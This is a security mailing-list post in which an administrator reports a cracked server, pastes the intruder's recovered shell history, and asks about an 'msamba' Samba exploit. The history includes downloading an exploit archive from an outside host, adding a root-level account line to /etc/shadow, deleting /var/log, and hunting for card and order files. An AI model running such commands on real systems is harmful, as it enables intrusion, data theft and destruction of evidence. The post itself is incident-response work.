msamba

[Steve Bromwich <incident () fop ns ca>]

Hi,

Has anyone seen an msamba exploit? A client of mine was cracked last night
using this. Whoever it was configured it to erase everything after a
reboot (I got in in time to see a lot of rm -rf and killed the box). I've
now reinstalled and restored the data, but I suspect the script kiddie is
trying to get in again. He was nice enough to leave a .bash_history in
/root:

ps -aux
w
find // | grep *db
find // | grep *.db
find // | grep index.html
cd /var/www
ls -al
cd tracking
ls -al
cd files
ls -al
cd /usr/share/sgml/docbook/stylesheet/dsssl/modular/images
ls -al
exit
cd /usr/share/doc
ls -al
cd /var/www
ls -al
find // | grep *.log
cd tracking
ls -al
cd files
ls -al
find // | grep index.*
find // | grep shop.mdb
find // | grep *.mdb
exit
cd /var
locate order.log
locate order.txt
locate mdb
locate metacart
locate card
cd www
echo "qe3 wuzz here uid=0">about_us.html
ps -aux
cd /etc/init.d
ls -al
./apache reload
ps -aux
cd /usr/etc
ls -al /
df
cd /opt
ls -al
wget cahcepu.net/dhegleng/msamba.tar.gz
pstree -p
chmod 555 /tmp
chmod 555 /var/tmp
chmod 555 /var/vbox
/usr/sbin/lsof |grep LISTEN
/sbin/fuser -n tcp 23
w
dir
tar xzvf 73.tgz
cd " "
dir
ls
cd ..
dir
cd evil
./setup muie 55055 angelboy () the-darkside info
w
passwd daemon
passwd daemon
echo uid:x:0:0::/:/bin/bash >> /etc/shadow
passwd $uid
w
locate .log
rm -rf /var/log/
chmod 555 /tmp
chmod 555 /var/tmp
w
pstree -p

I picked up the copy of msamba and had a look at it; it looks like it's
exploiting the recent samba bug for a wide variety of platforms (*BSD,
SuSE, Slackware, Redhat, Mandrake, Gentoo and Debian). There's a tag in
there that says "*** JE MOUET JE MUIL HOUWE - qe3" which I think might be
Dutch (and I think, based on scans I'm seeing, the guy might be coming in
from an IP registered to cyberangels.nl, but I don't have any hard proof).

Mail is being sent to slamet_irdak () yahoo com once the exploit gets in,
with output from uname -a and id being sent. The datestamp on the files
are 18 April 08:43, which makes me think this might be close on a zero day
exploit. I can't find anything about msamba googling around, either. The
only other hint I had was the client mentioned there was "a lot of stuff
about gzip running out of memory on the screen".

Unfortunately I don't have the data from the drive to do any forensics on;
as /var/log had been deleted it wasn't felt justified to go in deeper, and
I just reformatted and reinstalled.

Anyone else seen this? I'd like to make sure I've got everything tied down
enough that this won't happen again. Samba wasn't supposed to be on there,
and it's now been removed. I have a suspicion ssl might have been involved
too, due to the gzip comment and the way apache was reloaded.

Cheers, Steve

----------------------------------------------------------------------------
Attend Black Hat Briefings & Training Europe, May 12-15 in Amsterdam, the 
world's premier event for IT and network security experts.  The two-day 
Training features 6 hand-on courses on May 12-13 taught by professionals.  
The two-day Briefings on May 14-15 features 24 top speakers with no vendor 
sales pitches.  Deadline for the best rates is April 25.  Register today to 
ensure your place. http://www.securityfocus.com/BlackHat-incidents 
----------------------------------------------------------------------------